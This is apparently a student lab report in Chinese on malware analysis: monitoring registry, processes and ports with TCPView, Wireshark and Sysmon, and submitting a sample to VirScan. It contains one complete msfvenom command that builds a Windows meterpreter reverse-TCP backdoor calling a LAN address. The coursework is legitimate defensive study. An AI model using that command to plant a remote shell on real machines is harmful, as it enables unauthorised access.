20145338 索朗卓嘎 《網絡對抗》 惡意代碼分析

惡意代碼分析

問題回答

·總結一下監控一個系統一般須要監控什麼、用什麼來監控。

一般須要監控註冊表信息、進程、端口、服務、ip地址、數據流還有文件的行爲記錄以及權限。

能夠用：TCPview工具查看系統的TCP鏈接信息；ireshark進行抓包分析，查看網絡鏈接；sysmon用來監視和記錄系統活動。

·若是在工做中懷疑一臺主機上有惡意代碼，請設計下你準備如何找到對應進程、惡意代碼相關文件。

重啓計算機，並對計算機的註冊表，進程，端口，服務等內容進行檢測，並使用抓包軟件進行抓包，經過觀察註冊表，進程等內容的變化篩選出可疑的對象，而後針對可疑的對象在抓包過程當中具體分析，看看有沒有能夠的創建套接字（也就是鏈接其餘IP地址）的可疑操做，觀察能夠對象的流量是否異常，對數據包類型解析看看是否有可疑的內容，查看該程序是否獲取咱們主機權限，經過這些手段相結合還篩選出後門可能性較大的進程找到相應的代碼進行深刻分析和排查來找到惡意代碼。

實驗總結與體會

作實驗以前都是在緊張的睡覺、緊張的在玩手機、緊張的娛樂，可就是不想作 好難好難 非要拖到最後一刻。啊 作完 就輕鬆許多·····
遇到不會的東西要多耐心 思考與嘗試，或許會有surprise。

實踐過程記錄

首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzg2test.exe生成meterpreter可執行文件。
經過VirScan（http://www.virscan.org/）的行爲分析來分析惡意代碼：

[](http://images2015.cnblogs.com/blog/886524/201704/886524-20170407210214238-1916820006.png）

掃描文件後等待片刻出現文件"行爲分析"後點擊查看分析，他會出現文件的基本信息、網絡行爲、註冊表行爲和其餘行爲 。

惡意代碼動態分析

·下載項目附件的SysinternalsSuite201608，裏面有須要用的應用程序

Tcpview

Tcpview用於查看進行tcp鏈接的進程，能夠看到端口、目的ip等信息。

·sysmon工具
查看老師給的[使用輕量級工具Sysmon監視你的系統]快速安裝在管理員模式下快速安裝

配置xml文件sysmon -c slzg.xml，

並使用sysmon -c查看配置；

進入任務管理器，發現sysmon已經成功啓動

而後在在計算機管理工具-事件查看器下查看日誌信息

實現一個每五分鐘記錄有哪些程序在網絡 創建一個5338.TXT文件